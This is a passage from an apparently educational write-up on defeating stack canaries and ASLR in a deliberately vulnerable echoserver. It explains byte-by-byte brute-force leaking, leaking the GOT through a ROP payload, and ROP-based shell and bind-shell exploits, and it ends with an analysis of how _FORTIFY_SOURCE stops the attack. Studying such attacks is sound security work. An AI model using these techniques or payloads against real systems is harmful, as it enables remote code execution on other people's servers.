<p>There is a total of 12 bytes (8 bytes between buffer and stack canary, 4 bytes after the copy of the file descriptor corresponding to the socket provided as argument to <code>echo</code>) of unused memory that is never referenced in the whole function. This is probably due to stack alignment requirements.</p>
<p>We could then try to leak the stack canary with the known approach. After we know the stack canary, we could simply append it to the padding (used to overwrite <code>buffer</code> and the unused 8 bytes) and try the same approach for the saved frame pointer and later again for the return address.</p>
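<p>A probe for one further byte could be assembled as in the following Python sketch. The sizes are taken from the stack layout above; the canary, the already leaked bytes and the helper name <code>probe</code> are hypothetical example values and not taken from <code>poc.py</code>:</p>

```python
BUFFER_SIZE = 256  # char buffer[256] in echo
JUNK_SIZE = 8      # unreferenced bytes between buffer and stack canary

def probe(canary, known, guess):
    """Payload that restores the canary and then tries one more byte
    of the value that follows it (saved frame pointer, then return address)."""
    padding = b"A" * (BUFFER_SIZE + JUNK_SIZE)
    return padding + canary + known + bytes([guess])

# Hypothetical values, for illustration only.
canary = bytes.fromhex("0011223344556677")
known = b"\x40\xde"  # two bytes of the saved frame pointer leaked so far
payload = probe(canary, known, 0x7F)
print(len(payload), payload[264:272].hex())
```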
<p>If we manage to leak the saved frame pointer with this approach, we can derive other stack addresses from it by analyzing the stack layout and determining offsets, and, with the help of further offsets, the stack base address.<br />
If we manage to leak the return address with this approach, we can determine the base address where the ELF executable is loaded into memory, as we know the offset of the original return address from the base address (determined via <code>objdump -d echoserver</code> from the position independent executable).</p>
<p>The former result could help us to manipulate specific stack contents, the latter result could allow us to create ROP chains making use of the code found in the executable. With such ROP chains, we could maybe even leak addresses saved in the global offset table and thus determine the base address where libc is loaded.</p>
<p>As the server forks on each request, the memory layout is the same for each request and we can thus apply information gathered by one request on any following requests to the server.</p>
<p>However, there is a problem with this idea: The brute force script (<a href="./Stack%20canary%20bypassing/poc.py">poc.py</a> Python script) relies on the server’s behavior concerning success messages (here: “OK” as success message). When we overwrite the stack canary with a wrong value, the server immediately aborts on trying to return from the <code>echo</code> function and thus never sends the success message. Thus, the client knows that the value was incorrect.<br />
The behavior is a little bit different concerning the saved frame pointer or the return address. If we provide incorrect values for those, the server is likely to crash with a segmentation fault, an illegal instruction fault or a similar error when trying to return from <code>echo</code>. However, it is only likely to crash; it does not necessarily crash. For example, if we overwrite the return address in such a way that the program returns to valid code (e.g. in <code>main</code>, right before the call to <code>echo</code>), the server could still return a success message and the client would assume that it found the correct value even if that is not the case. The other way round, the server could return to valid code and continue working just fine (e.g. by returning into <code>main</code> so that only the sending of the success message is skipped), but the client would assume that an error occurred because no success message was received.</p>
<p>Those examples show that, concerning the saved frame pointer and the return address, the brute force script might not be able to reliably distinguish between a server that crashed because of incorrect values and a server that only seemingly crashed. Because of that, those values cannot be determined reliably and other approaches should be evaluated.</p>
<p>An interesting observation is that this approach seems to work more reliably if a short delay between requests to the server is introduced. Without any delay, <code>echoserver</code> processes are spawned so quickly on the server that the main memory runs full as those processes have to wait for TCP connections to close (TIME_WAIT) and they thus cannot exit immediately after having finished the main work.<br />
With a delay introduced, the server isn’t hit with requests as hard and thus the memory does not fill up completely as fast. This seems to make the approach described in this section much more reliable. The <code>poc.py</code> script can thus determine the stack canary, saved frame pointer and return address in most of the cases. Additional measures that increased the success reliability were to increase the memory of the virtual machine (4GiB =&gt; 8GiB) and wait between several runs until all TCP sessions are closed (open connections can be determined via <code>netstat -tupan</code>).<br />
Those observations imply that errors from this exploit might be more related to memory/computational issues than to logical issues concerning the overwritten values.</p>
<p>In conclusion, even though this attack does not always work, it works most of the time. We not only reveal the stack canary but also the saved frame pointer which gives us information about stack addresses and the return address which gives us information about where the executable is loaded into memory.</p>
<h3 id="leaking-the-global-offset-table-and-determining-libc-base-address">Leaking the Global Offset Table and determining libc base address</h3>
<p>As soon as we have retrieved the stack canary, saved frame pointer and return address (for returning from <code>echo</code>), we can determine the base address at which the executable is loaded into memory. As we have access to the <code>echoserver</code> binary, we can disassemble it (<code>objdump -d echoserver</code> or also with <code>r2 echoserver</code>, if radare2 is preferred; other tools are of course also possible) and determine the offset of the instruction to which the <code>echo</code> function returns. By subtracting this offset from the leaked return instruction pointer, we get the executable’s base address in memory.</p>
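<p>The subtraction can be sketched in a few lines of Python. The leaked address and the offset below are invented example values, and <code>executable_base</code> is a hypothetical helper; the page alignment check is an additional sanity test based on the fact that load addresses are page aligned:</p>

```python
PAGE_SIZE = 0x1000

def executable_base(leaked_return_address, return_offset):
    """Base address = leaked return address minus its offset inside the binary."""
    base = leaked_return_address - return_offset
    # A base that is not page aligned hints at a wrong leak or a wrong offset.
    if base % PAGE_SIZE != 0:
        raise ValueError("base address is not page aligned")
    return base

# Hypothetical example values.
leaked = 0x55D1C3A0B4F2  # return address leaked byte by byte
offset = 0x14F2          # offset of that instruction, e.g. read from objdump -d
base = executable_base(leaked, offset)
print(hex(base))
```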
<p>We can also determine the offset of the global offset table (GOT) in the executable. The next steps are then as follows:</p>
<ol type="1">
<li>Output GOT entries over the socket to the client</li>
<li>Determine libc address of a specified function (here: <code>write</code>)</li>
<li>Determine libc offset of a specified function (here: <code>write</code>)</li>
<li>From address and offset, calculate libc base address</li>
</ol>
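<p>Steps 2 to 4 boil down to reading a pointer from the leaked bytes and subtracting a known offset. The Python sketch below illustrates this with invented data: the dump contents, the position of <code>write</code> in the dump and its libc offset are all assumptions for the example, and the helper names are hypothetical.</p>

```python
def got_entry(dump, index):
    """Read the index-th 8-byte little-endian pointer from a leaked GOT dump."""
    return int.from_bytes(dump[8 * index:8 * index + 8], "little")

def libc_base(function_address, function_offset):
    """libc base = runtime address of a function minus its offset inside libc."""
    return function_address - function_offset

# Hypothetical dump containing two resolved GOT entries.
dump = (0x7F3A1C2EE210).to_bytes(8, "little") + (0x7F3A1C25D970).to_bytes(8, "little")
WRITE_INDEX = 0          # assumed position of write in the dump
WRITE_OFFSET = 0x10E210  # assumed offset of write inside the libc in use

write_address = got_entry(dump, WRITE_INDEX)
base = libc_base(write_address, WRITE_OFFSET)
print(hex(write_address), hex(base))
```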
<p>The first step is pretty easy thanks to how the executable is compiled. In order to output a GOT entry over the socket, we want to execute <code>write</code> with the necessary parameters. <code>write</code> expects the file descriptor to write to (here: our socket) in register <code>rdi</code>, the address of the buffer to write in <code>rsi</code> and the number of bytes to write in <code>rdx</code>.<br />
This means that we have to find the socket file descriptor and somehow load it into <code>rdi</code>, load the address of a GOT entry into <code>rsi</code> and the number of bytes (preferably 8 bytes == 64 bits for the address) into <code>rdx</code>. As we so far only have the base address of the executable, we could try to build a ROP chain that does exactly what we want just with instructions from the executable. When analysing the executable (e.g. with <code>objdump</code> or <code>ropper</code>), however, we see that we could easily pop information from the stack into <code>rdi</code> (i.e. the file descriptor / socket) but not easily move information from other registers into <code>rdi</code>. We would also have to find the right value on the stack at first, as we cannot determine the file descriptor beforehand and thus put it on the stack manually. Luckily, <code>echo</code> also loads the file descriptor into <code>rdi</code> in order to write the user input back to the user (i.e. in order to echo the user input). As <code>rdi</code> is not overwritten before <code>echo</code> returns, we already have the right file descriptor in <code>rdi</code>.<br />
The approach for <code>rdx</code> (i.e. the number of bytes to write) is similar. Again, it is not easy to find an instruction chain that modifies <code>rdx</code> in the way we want. Luckily, <code>rdx</code> is already set for the same <code>write</code> operation in <code>echo</code> as <code>rdi</code> above and is not overwritten afterwards. Here, <code>rdx</code> contains the number of bytes that were read from the socket beforehand (i.e. the length of the user input). Thus, we know that the value of <code>rdx</code> is somewhere between 256 (at least 256 bytes are needed for a buffer overflow) and 1024 (the maximum number of bytes specified in the <code>read</code> function call). The approach is then to leak not just one specific address but the whole start of the GOT and to extract the relevant entries from that output. This also allows us to compare the libc addresses of different functions, which might be necessary to determine the libc version (if not known) by finding identifying offset patterns between functions in libc.<br />
Last but not least <code>rsi</code> has to be prepared with the address where we want to read from (i.e. the GOT address). As described above, we can determine this address with the help of the leaked base address of the executable. With a <code>pop rsi; pop r15; ret</code> instruction chain found in the executable, we can then just put this address onto the stack and pop it into <code>rsi</code>.</p>
<p>The payload (as found in <a href="./Stack%20canary%20bypassing/poc.py#L62">poc.py</a>) is then as follows:</p>
<div class="sourceCode" id="cb30"><pre class="sourceCode python"><code class="sourceCode python"><a class="sourceLine" id="cb30-1" data-line-number="1">payload <span class="op">=</span> b<span class="st">''</span></a>
<a class="sourceLine" id="cb30-2" data-line-number="2">payload <span class="op">+=</span> b<span class="st">'A'</span> <span class="op">*</span> <span class="dv">264</span>       <span class="co"># Padding</span></a>
<a class="sourceLine" id="cb30-3" data-line-number="3">payload <span class="op">+=</span> canary           <span class="co"># Stack canary</span></a>
<a class="sourceLine" id="cb30-4" data-line-number="4">payload <span class="op">+=</span> sfp              <span class="co"># Saved frame pointer</span></a>
<a class="sourceLine" id="cb30-5" data-line-number="5">payload <span class="op">+=</span> poprsi_addr      <span class="co"># pop rsi; pop r15; ret address</span></a>
<a class="sourceLine" id="cb30-6" data-line-number="6">payload <span class="op">+=</span> got_addr         <span class="co"># GOT address to pop into rsi</span></a>
<a class="sourceLine" id="cb30-7" data-line-number="7">payload <span class="op">+=</span> p64(<span class="bn">0x0</span>)         <span class="co"># Junk to pop into r15</span></a>
<a class="sourceLine" id="cb30-8" data-line-number="8">payload <span class="op">+=</span> write_addr       <span class="co"># Write instruction to return to (destination file descriptor set in echo, number of bytes set in echo)</span></a></code></pre></div>
<p>This code lets the executable return to the <code>pop rsi; pop r15; ret</code> instruction chain, pops the GOT address into <code>rsi</code> and then returns to the <code>write</code> function call in <code>main</code> which then outputs GOT contents to the client.</p>
<p>It is then easy to find the libc address of a function (here: <code>write</code>) in the output, determine the offset in libc (e.g. with <code>readelf -s /lib/x86_64-linux-gnu/libc.so.6 | grep write</code>) and then calculate the libc base address from the function’s address and its offset in libc.</p>
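<p>As a rough sketch of this last step, the leaked bytes can be split into 8-byte entries and the libc base derived from one of them. The GOT index of <code>write</code>, its libc offset and the example addresses below are hypothetical placeholders; the real values have to be read from the binaries as described above.</p>

```python
import struct


def parse_got(dump: bytes) -> list:
    """Split a raw GOT dump into little-endian 64-bit entries."""
    usable = len(dump) - len(dump) % 8  # ignore a trailing partial entry
    return [value for (value,) in struct.iter_unpack("<Q", dump[:usable])]


def libc_base(func_addr: int, func_offset: int) -> int:
    """Derive the libc load address from one resolved function address."""
    base = func_addr - func_offset
    if base % 0x1000 != 0:
        raise ValueError(f"implausible libc base {base:#x}")
    return base


# Hypothetical values for illustration only.
WRITE_GOT_INDEX = 3           # assumed position of write in the dump
WRITE_LIBC_OFFSET = 0x10E280  # assumed offset, normally taken from readelf -s
fake_base = 0x7FFFF7DD5000
dump = struct.pack("<4Q", 0, 0, 0, fake_base + WRITE_LIBC_OFFSET) + b"\x00" * 3

entries = parse_got(dump)
print(hex(libc_base(entries[WRITE_GOT_INDEX], WRITE_LIBC_OFFSET)))
```

<p>Because the whole start of the GOT is dumped, the same <code>entries</code> list can be used to compare several function addresses against candidate libc versions.</p>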
<p>The base address at which libc is loaded into memory can then be used in further exploits as we then can call arbitrary functions from libc or also have way more instructions for building ROP chains at our hands. Thus, we can effectively not only bypass stack canaries but also ASLR if we manage to also leak the saved frame pointer and the return instruction pointer.</p>
<h3 id="executing-arbitrary-code">Executing arbitrary code</h3>
<p>We basically already executed arbitrary code when <a href="#leaking-the-global-offset-table-and-determining-libc-base-address">leaking the GOT</a>. Because we could calculate the base address at which the executable was loaded, we were able to calculate addresses of instructions to return the data in the GOT over the network.<br />
With that, we can also calculate the base address of libc which gives us a lot more opportunities to create an exploit.</p>
<p>The easiest exploit is just to <a href="./Stack%20canary%20bypassing/poc.py#L79">spawn a shell</a>. This exploit just takes the address of a “/bin/sh” string found in libc and passes it to a call to <code>system()</code>. The necessary addresses can be easily calculated by the offsets found in the binaries (executable and libc) and the leaked base addresses.<br />
Of course this exploit is not of great use, as it spawns the shell in the server process, i.e. the shell opens up on the server side with the client not being connected to it. Thus, only somebody having access to the server itself can input something onto the shell command line.</p>
<p>A more sophisticated and useful attack is to bind a shell to a TCP port so that we can easily connect to the shell over the network (e.g. with <code>netcat</code>). This exploit has to be conducted in several steps:</p>
<ol type="1">
<li>Create a socket</li>
<li>Bind the socket to a port and listen for connections</li>
<li>On incoming connections: redirect <code>stdin</code>, <code>stdout</code> and <code>stderr</code> to connection socket</li>
<li>Replace current process with shell (“/bin/sh”)</li>
</ol>
<p>The necessary functions (<code>socket</code>, <code>bind</code>, <code>dup2</code>, <code>execve</code>, etc.) can all be found in libc. This means that we only have to prepare the registers containing the arguments to those functions in the right way with the help of ROP gadgets (i.e. short assembly instruction chains ending in <code>ret</code>, found for example with <code>ropper -f /lib/x86_64-linux-gnu/libc.so.6</code>) and can then directly return to those functions. In the end, we basically didn’t put shellcode onto the stack but only the addresses to parts of the shellcode which are executed so that a shell is bound to a TCP port.</p>
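<p>How such a chain is laid out on the stack can be sketched with a small helper. This is a simplified illustration and not the code from <code>poc.py</code>: the helper <code>rop_call</code>, the gadget offsets and the function offset are invented for this example, and it assumes that plain <code>pop &lt;reg&gt;; ret</code> gadgets exist for the needed registers.</p>

```python
import struct


def p64(value: int) -> bytes:
    """Pack a 64-bit value in little-endian byte order."""
    return struct.pack("<Q", value)


def rop_call(libc_base: int, gadgets: dict, func_offset: int, **regs: int) -> bytes:
    """Build a chain fragment that loads registers and returns into a function."""
    chain = b""
    for reg, value in regs.items():
        chain += p64(libc_base + gadgets[reg])  # address of "pop <reg>; ret"
        chain += p64(value)                     # value popped into the register
    chain += p64(libc_base + func_offset)       # final ret jumps into the function
    return chain


# Hypothetical offsets for illustration only.
LIBC_BASE = 0x7FFFF7DD5000
GADGETS = {"rdi": 0x2000, "rsi": 0x3000}
DUP2_OFFSET = 0x4000

# Fragment corresponding to dup2(4, 0): redirect stdin to descriptor 4.
fragment = rop_call(LIBC_BASE, GADGETS, DUP2_OFFSET, rdi=4, rsi=0)
print(len(fragment), "bytes")
```

<p>Every register argument costs 16 bytes and every call another 8 bytes, which is why chains of several calls grow quickly.</p>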
<p>However, there are several problems with this kind of exploit: Firstly, the exploit relies on the server not using any string functions (such as <code>strcpy</code>, <code>fgets</code>, etc.) but only the <code>read</code> function, which reads binary data. As the <a href="./Stack%20canary%20bypassing/poc.py#L111">exploit code</a> contains a lot of <code>0x00</code> bytes, any string-based function would interpret such a byte as the end of the string and ignore any important data after it.<br />
Secondly, we have a buffer of 256 bytes here that we overflow with a maximum of 1024 bytes (cf. <a href="./Stack%20canary%20bypassing/echoserver.c#L14">echoserver.c, lines 14 and 19</a>). If our ROP chain were even longer than it already is, or if the <code>read</code> function read far fewer than 1024 bytes, we would not be able to put that much data into the buffer and overflow it correctly. As we’re putting lots of addresses onto the stack and each address is 64 bits (== 8 bytes), the payload for the exploit quickly becomes very big. Pure shellcode doing exactly what was described above <a href="https://www.exploit-db.com/shellcodes/46979">is in the range of around 100 bytes</a>, whereas the payload for this exploit is in the range of around 700 - 800 bytes.</p>
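<p>The size limit can be made concrete with a short calculation. The numbers are taken from the non-optimized payload shown earlier (264 bytes of padding, 8 bytes each for canary and saved frame pointer) and from the 1024-byte <code>read</code> limit; the variable names are only illustrative.</p>

```python
MAX_READ = 1024   # maximum number of bytes read by the server
PADDING = 264     # bytes needed to reach the stack canary
CANARY = 8        # leaked stack canary
SAVED_FP = 8      # leaked saved frame pointer
WORD = 8          # size of one address or value in the chain

prefix = PADDING + CANARY + SAVED_FP
chain_budget = MAX_READ - prefix
max_entries = chain_budget // WORD

print(f"prefix: {prefix} bytes")
print(f"room for the ROP chain: {chain_budget} bytes ({max_entries} entries)")
```

<p>This prints a prefix of 280 bytes and a budget of 744 bytes, i.e. at most 93 addresses or values in the chain.</p>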
<p>As already mentioned above, this exploit only works if the resulting payload is less than 1024 bytes long in this case. A possibility to work around this restriction is to not include the actual exploit code we want to execute in the end in the initial overflow payload but to let the overflow payload allocate memory, read from the network socket to this memory and then execute the content of that memory. The steps are then as follows:</p>
<ol type="1">
<li>Allocate memory</li>
<li>Mark allocated memory as executable</li>
<li>Read shellcode from socket and write it to this memory</li>
<li>Execute the shellcode</li>
</ol>
<p>The code for this exploit can be found in <a href="./Stack%20canary%20bypassing/poc.py#L199">poc.py</a>.</p>
<p>As long as we allocate enough memory in the first place, our shellcode is basically not restricted in length. The original payload shrinks down from around 770 bytes to around 490 bytes.<br />
Apart from the shorter payload and the basically unrestricted length of the shellcode, the other restrictions as explained above still apply.</p>
<p>All in all, a single buffer overflow vulnerability in a server application can lead to arbitrary code execution. However, at least in our case, there are several prerequisites which make the exploit possible, namely binary operations instead of string operations (i.e. <code>read</code> and <code>write</code>), the distinguishability between a successful call to the server (returns “OK”) and a crash, the huge amount of data to be read over the network for the initial overflow (1024 bytes), etc.</p>
<h2 id="optimizing-compilation-3">Optimizing compilation</h2>
<p>Similar to the previous sections, the results differ when compiling with compiler optimizations enabled via the <code>-O3</code> compiler flag.</p>
<h3 id="stack-analysis---getcanary-and-getcanarythreaded-1">Stack analysis - <code>getCanary</code> and <code>getCanaryThreaded</code></h3>
<p>Those two executables still work just as <a href="#stack-analysis---getcanary-and-getcanarythreaded">previously</a> described. The only difference is that the stack layout is a little bit different because some stack variables were optimized away and/or are now only kept in registers.</p>
<p>For example, in the <code>getCanary</code> executable the array <code>uint8_t buf[8]</code> in <code>main</code> is optimized away, as it is never used again after it has been initialized. Additionally, <code>uint64_t *ptr</code> and <code>uint64_t i</code> in <code>func</code> are omitted. Instead of setting a base address (<code>ptr</code>), adding to or subtracting from that address and keeping a separate counter (<code>i</code>) for comparisons, the optimized code uses a start address (<code>buf - 0x18</code> == <code>buf - 24</code> == <code>ptr - 3</code>, as <code>ptr</code> is a pointer to an 8-byte-wide value and <code>buf</code> is a pointer to a 1-byte-wide value), increments it by 8 (bytes) on each iteration and compares it directly to a target address (<code>buf + 0x88</code> == <code>buf + 136</code> == <code>ptr + 17</code>).</p>
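<p>The conversion between byte offsets relative to <code>buf</code> and element offsets relative to <code>ptr</code> can be checked with a few lines of arithmetic. The sketch assumes that <code>ptr</code> and <code>buf</code> refer to the same address and that the target address itself is not read any more; both are assumptions of this example.</p>

```python
ELEMENT_SIZE = 8     # sizeof(uint64_t), the type ptr points to

start_bytes = -0x18  # buf - 0x18
end_bytes = 0x88     # buf + 0x88

# Both byte offsets must be multiples of the element size.
assert start_bytes % ELEMENT_SIZE == 0 and end_bytes % ELEMENT_SIZE == 0

start_index = start_bytes // ELEMENT_SIZE  # offset relative to ptr
end_index = end_bytes // ELEMENT_SIZE
iterations = (end_bytes - start_bytes) // ELEMENT_SIZE

print(f"ptr{start_index:+d} .. ptr{end_index:+d}, {iterations} iterations")
```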
<p>Apart from such smaller changes, the executables still work as expected and output stack contents, including the stack canaries which can still be identified as they can be found directly after the buffer that was filled with the value <code>0x41</code> (which is the hexadecimal representation of the ASCII letter A).</p>
<h3 id="brute-force-leaking-1">Brute force leaking</h3>
<p>The Linux man page for <code>feature_test_macros</code> (shell command <code>man feature_test_macros</code> or found <a href="http://man7.org/linux/man-pages/man7/feature_test_macros.7.html">on web versions of the man page</a>) states the following:</p>
<blockquote>
<p>If _FORTIFY_SOURCE is set to 1, with compiler optimization level 1 (gcc -O1) and above, checks that shouldn’t change the behavior of conforming programs are performed. With _FORTIFY_SOURCE set to 2, some more checking is added, but some conforming programs might fail.</p>
</blockquote>
<p>Because <code>_FORTIFY_SOURCE</code> is set to 2 by default, leaking the stack canary from the <code>echoserver</code> executable does not work anymore. Instead of making a call to <code>read</code> in the <code>echo</code> function, <code>__read_chk</code> is called. This function is a wrapper around <code>read</code> which checks for buffer overflows at runtime. As the call to <code>read</code> is intentionally vulnerable, this overflow check yields a positive result (i.e. an overflow is detected), cancels the operation and kills the program before the overflow can be exploited. Thus, it is not possible to leak the stack canary with such measures enabled.</p>
<p>When the <code>-U_FORTIFY_SOURCE -D_FORTIFY_SOURCE=0</code> compiler flags are added, such checks are disabled and the stack canary can be leaked in exactly the same way as for the non-optimized version of the <code>echoserver</code> executable. Even though some optimizations are made (e.g. keeping the <code>int fd</code> argument to the <code>echo</code> function and the <code>ssize_t n</code> variable only in registers instead of putting them on the stack) and the stack layout thus may differ, the compiler performs no inlining or other optimizations that would prevent the exploit from succeeding.</p>
<h3 id="extended-brute-force-leaking-1">Extended brute force leaking</h3>
<p>As the exploits for <a href="#leaking-saved-frame-pointer-and-return-instruction-pointer-return-address">leaking the return address</a> (brute force guessing by stack buffer overflow) and <a href="#leaking-the-global-offset-table-and-determining-libc-base-address">leaking the GOT</a> in order to bypass ASLR as well as the exploits for <a href="#executing-arbitrary-code">code execution</a> based on those leaks all need to overflow the vulnerable stack buffer, they are subject to the <code>_FORTIFY_SOURCE</code> protection mechanism as described in the <a href="#brute-force-leaking-1">previous section</a>, just like the brute force attempt for leaking the stack canary. This means that simply activating compiler optimizations already prevents a malicious client from overflowing the buffer in the server, and thus from leaking stack information and finally gaining control over the control flow.</p>
<p>The exploit is thus still able to run a DoS (Denial of Service) attack against the server by crashing it but cannot influence control flow. Even the DoS attack does not have any significant impact, as it only hits a child process of the main server process. Only that child process crashes, so future connections to the main process are still possible.</p>
<p>With the <code>-U_FORTIFY_SOURCE -D_FORTIFY_SOURCE=0</code> compiler flags set, the exploits work just like they did before with some smaller adjustments to offsets, addresses and padding lengths. This is due to the different structure of the executable and the stack when running the executable.</p>
<p>For example, in the non-optimized executable we had the following stack layout in the <code>echo</code> function:</p>
<pre><code>higher address  |                                   |
                +-----------------------------------+  ---+
                | return address                    |     |
                +-----------------------------------+     |
                | saved frame pointer               |     |
                +-----------------------------------+     |
                | stack canary                      |     |
                +-----------------------------------+     |
                | unreferenced junk                 |     |
                +-----------------------------------+     |
                | char buffer[255 - 248]            |     |
                | char buffer[247 - 240]            |     +--- stack frame of echo
                |            ...                    |     |
                | char buffer[15 - 8]               |     |
                | char buffer[7 - 0]                |     |
                +-----------------------------------+     |
                | ssize_t n                         |     |
                +-----------------------------------+     |
                | uint64_t *canary                  |     |
                +-----------------+-----------------+     |
                | copy of int fd  |       junk      |     |
                +-----------------+-----------------+  ---+
lower address   |                                   |</code></pre>
<p>The stack layout for the optimized executable looks a little bit different:</p>
<pre><code>higher address  |                                   |
                +-----------------------------------+  ---+
                | return address                    |     |
                +-----------------------------------+     |
                | saved r12 contents (junk)         |     |
                +-----------------------------------+     |
                | saved ebp contents (socket)       |     |
                +-----------------------------------+     |
                | unreferenced junk                 |     |
                +-----------------------------------+     |
                | stack canary                      |     +--- stack frame of echo
                +-----------------------------------+     |
                | unreferenced junk                 |     |
                +-----------------------------------+     |
                | char buffer[255 - 248]            |     |
                | char buffer[247 - 240]            |     |
                |            ...                    |     |
                | char buffer[15 - 8]               |     |
                | char buffer[7 - 0]                |     |
                +-----------------------------------+  ---+
lower address   |                                   |</code></pre>
<p>In both cases, each line refers to 8 bytes. The stack frame of the <code>echoserver</code> executable compiled with compiler optimizations enabled contains two unused 8-byte gaps, whereas the executable compiled without compiler optimizations allocates a total of 12 bytes of unused space on the stack in the <code>echo</code> function. In the optimized executable, the first gap (between the saved registers and the stack canary) is caused by decrementing <code>rsp</code> by <code>0x118</code> and writing the stack canary to <code>rsp + 0x108</code>, which leaves <code>rsp + 0x110</code> up to <code>rsp + 0x117</code> unused. The second gap is caused by the buffer being located at position <code>rsp</code> (after decrementing the stack pointer, of course) and thus occupying the space up to and including <code>rsp + 0xff</code> (i.e. 256 bytes), whereas the next important object (the stack canary) is located at <code>rsp + 0x108</code>. This is probably due to stack alignment requirements.</p>
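<p>The consequences for the payload offsets can be derived directly from the two diagrams. The following sketch lists the stack slots from the start of the buffer upwards and accumulates their sizes; the helper <code>offsets</code> and the slot names are illustrative and not part of the exploit scripts.</p>

```python
def offsets(layout):
    """Map each slot name to its byte offset from the start of the buffer."""
    result = {}
    position = 0
    for name, size in layout:
        result[name] = position
        position += size
    return result


# Slots from the buffer towards higher addresses, as in the diagrams.
unoptimized = [
    ("buffer", 256), ("junk", 8), ("canary", 8),
    ("saved frame pointer", 8), ("return address", 8),
]
optimized = [
    ("buffer", 256), ("junk below canary", 8), ("canary", 8),
    ("junk above canary", 8), ("saved ebp", 8), ("saved r12", 8),
    ("return address", 8),
]

for label, layout in (("unoptimized", unoptimized), ("optimized", optimized)):
    table = offsets(layout)
    print(label, "canary at", table["canary"],
          "return address at", table["return address"])
```

<p>In both builds the canary starts 264 bytes (<code>0x108</code>) after the start of the buffer, but the return address moves from offset 280 to offset 296 in the optimized build, so 16 additional bytes have to be written after the canary.</p>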
<p>Those changes in the stack layout make it necessary to account for the additional stack space (the space for the saved <code>r12</code> register as well as the unreferenced stack space) when padding the string to overflow the buffer and overwrite the canary and the return address. Additionally, offsets based on the <code>echoserver</code> executable have to be changed, as the binary’s structure of course is different when compiled with the <code>-O3</code> flag. Fortunately, those are just smaller changes (reflected in the <a href="./Stack%20canary%20bypassing/poc_optimized.py">poc_optimized.py</a> Python script), as the main parts of the exploit are based on assembly instructions taken from libc. As the linked libc doesn’t change, the offsets for those instructions also stay the same.</p>
<p>An important change concerns the return address leaking. In the optimized executable, the Procedure Linkage Table (PLT) is located directly before the <code>main</code> function, and the offsets are such that, when brute forcing the last byte of the return address, the <code>echo</code> function returns to the PLT entry of <code>fork</code> over and over again. It is therefore not possible to leak the return address without creating a lot of child processes which quickly fill up the memory.<br />
To prevent this problem from occurring, it is necessary to fix the last return address byte in the exploit script in order to not have this problematic offset when returning from <code>echo</code>. As the last address byte always stays the same (independent of ASLR, as the last byte is not randomized), we do not weaken the ASLR bypassing functionality with this measure. In fact, for all of the exploits we assumed having access to the executable binary file in order to analyze it (to find the right stack offsets as well as useful assembly instructions to return to). Under this assumption, we could of course also easily determine the last return address byte from the executable which is why this measure does not impose any additional prerequisites on the exploits to work.</p>
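<p>One way to express this measure in a brute force loop is to restrict the candidate values for a byte position whose value is already known. The sketch below is a hypothetical illustration (the helper <code>byte_candidates</code> and the byte value <code>0x42</code> are made up) and is not the code used in <code>poc_optimized.py</code>.</p>

```python
def byte_candidates(position, known=None):
    """Return the values to try for one byte of the return address."""
    known = known or {}
    if position in known:
        return [known[position]]  # fixed byte, read from the binary
    return list(range(256))       # unknown byte, try every value


# Hypothetical: the least significant byte (position 0) is known to be 0x42.
KNOWN = {0: 0x42}

with_fix = sum(len(byte_candidates(i, KNOWN)) for i in range(8))
without_fix = sum(len(byte_candidates(i)) for i in range(8))
print(with_fix, "vs", without_fix, "attempts in the worst case")
```

<p>Besides avoiding the problematic return into the PLT, fixing the byte also removes up to 255 guesses from the search.</p>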
<p>All in all, the provided exploits for leaking addresses, thus bypassing ASLR and therefore fully controlling the execution flow are basically worthless without setting the <code>-U_FORTIFY_SOURCE -D_FORTIFY_SOURCE=0</code> compiler flags. With those flags set, there is basically not much of a difference for the exploit complexity whether the executable is compiled with optimizations enabled or not.</p>
</article>
</body>
</html>